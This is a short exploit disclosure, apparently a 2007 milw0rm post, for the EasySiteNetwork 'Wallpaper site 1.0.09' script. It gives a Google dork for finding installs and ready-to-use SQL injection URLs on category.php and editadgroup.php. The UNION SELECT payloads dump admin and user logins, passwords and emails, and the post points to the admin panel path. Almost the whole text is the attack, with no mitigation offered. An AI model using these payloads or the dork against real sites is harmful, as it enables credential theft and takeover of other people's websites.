# .__ __.
# NN) NNNN JNNN` NNNN. NNN NNNNNNNNNNN NN)
# NN) `NNN).NNNF .NNNNN (NN) """4NNN"""` NN)
# NN) (NNNNNN` (NNNNN) NNN (NNN NN)
# NN) 4NNNN` NNN(NNN.NNF NNN) NN)
# NN) JNNNNL (NN) NNNNNN) (NNN NN)
# NN) JNNNNNN) JNN` `NNNNN JNNF NN)
# NN) .NNNF (NNN. NNN 4NNN) NNN) NN)
# NN) JNNN` NNNN (NN) NNN` (NNN NN)
# NN) NN)
# .__ http://xaker.name __.
#
#
# script name : Wallpaper site 1.0.09
# GoogLe Dork : Powered by EasySiteNetwork
# Of. site : http://www.easysitenetwork.com/
# The price : ?
# Risk : Average
# Found By : Koller
# Thanks : all members xaker.name & grabberz.com
# Vulnerable files : category.php, editadgroup.php
# Vuln : www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
# www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/*
#
# Admin panel: www.victim.com/siteadmin/index.php
#
# Addon :) - sql-injection in editadgroup.php - www.victim.com/siteadmin/editadgroup.php?groupid=2 union select 111,222/*
# P.s. Happy New Year 8)
#
# Contact: K0ller (at) hotmail (dot) CoM
# milw0rm.com [2007-12-22]